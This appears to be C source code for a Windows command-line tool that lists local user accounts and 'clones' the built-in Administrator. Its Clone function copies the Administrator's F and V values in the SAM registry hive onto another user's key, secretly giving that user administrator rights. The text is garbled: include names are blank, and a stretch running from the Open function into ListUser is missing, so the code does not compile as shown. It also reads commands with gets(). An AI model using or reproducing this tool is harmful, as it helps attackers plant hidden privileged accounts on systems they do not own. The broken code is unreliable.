//--------------------------------------------------------------------------- //用法: //编辑好后,需要自己用regedt32把SAM键及其子键设置为administrator可以访问才能使用 //--------------------------------------------------------------------------- #include #include char name[50][30];//这些是Open函数里的 int openN=0; #pragma hdrstop //--------------------------------------------------------------------------- #pragma argsused //--------------------------------------------------------------------------- // Open // 打开一个键 //--------------------------------------------------------------------------- void Open(char *set) { int i=0; HKEY hkey; DWORD dwlndex=0,cbname=100,ret=0; char temp[100],szBuff[100]; FILETIME ftlastwt; ZeroMemory(szBuff,100); ZeroMemory(temp,100); ZeroMemory(name,1500); RegOpenKeyEx(HKEY_LOCAL_MACHINE, set, 0, KEY_ALL_ACCESS, &hkey); for( i=0 ; ret==ERROR_SUCCESS ; i++, dwlndex++ ) { ret = RegEnumKeyEx( hkey, dwlndex, temp, &cbname, NULL, NULL, NULL, &ftlastwt ); strcat(name[i],temp); ZeroMemory(temp,100); cbname=100; } RegCloseKey(hkey); for(openN=0;openN"); printf("%s",szTemp); ViewType(szBuff); strcpy(szBuff,"SAM\\SAM\\Domains\\Account\\Users\\Names\\"); } return 1; } //--------------------------------------------------------------------------- // Clone // 克隆帐号 //--------------------------------------------------------------------------- int Clone(char *user) { HKEY hkeyRoot,hkeyUser; char CloneUserKey[100]; DWORD Type=REG_BINARY,sizeF=1024*2,sizeV=1024*10,ret; LPBYTE lpDataF,lpDataV; lpDataF = (LPBYTE) malloc(1024*2); lpDataV = (LPBYTE) malloc(1024*10); ZeroMemory(lpDataF,1024*2); ZeroMemory(lpDataV,1024*10); ZeroMemory(CloneUserKey,100); strcpy(CloneUserKey,"SAM\\SAM\\Domains\\Account\\Users\\00000"); strcat(CloneUserKey,user); ret= RegOpenKeyEx( HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\000001F4", 0, KEY_ALL_ACCESS, &hkeyRoot); if(ret==ERROR_SUCCESS) ; else { printf("open key FAIL\n\r"); return 0; } ret = RegQueryValueEx( hkeyRoot, // handle to key "F", // value name NULL, // reserved &Type, // type buffer lpDataF, // data buffer &sizeF // size of data buffer ); if(ret==ERROR_SUCCESS) ; else { printf("Query key FAIL\n\r"); return 0; } ret = RegQueryValueEx( hkeyRoot, // handle to key "V", // value name NULL, // reserved &Type, // type buffer lpDataV, // data buffer &sizeV // size of data buffer ); if(ret==ERROR_SUCCESS) ; else { printf("Query key FAIL\n\r"); return 0; } ret = RegOpenKeyEx( HKEY_LOCAL_MACHINE, CloneUserKey, 0, KEY_ALL_ACCESS, &hkeyUser); if(ret==ERROR_SUCCESS) ; else { printf("open key FAIL\n\r"); return 0; } ret= RegSetValueEx( hkeyUser, "F", 0, REG_BINARY, lpDataF, sizeF); if(ret==ERROR_SUCCESS) ; else { printf("set key FAIL\n\r"); return 0; } ret= RegSetValueEx( hkeyUser, "V", 0, REG_BINARY, lpDataV, sizeV); if(ret==ERROR_SUCCESS) ; else { printf("set key FAIL\n\r"); return 0; } if(ret==ERROR_SUCCESS) printf("clone SUCCESS\n\r"); else { printf("clone FAIL\n\r"); return 0; } RegCloseKey(hkeyRoot); RegCloseKey(hkeyUser); return 1; } //--------------------------------------------------------------------------- // main() // 主调函数 //--------------------------------------------------------------------------- int main() { char command[20]={'\0'}; char temp[5]={'\0'}; printf("\n=*=Clone Account Ver0.01 Code By NOIR=*=\n\n"); while(1) { printf("please enter the command:"); gets(command); if( (strcmp(command,"listuser"))==0 ) ListUser(); if( (strncmp(command,"clone",5))==0 ) { strcpy(temp,command+6); Clone(temp); } if( (strcmp(command,"exit")==0) ) exit(0); } }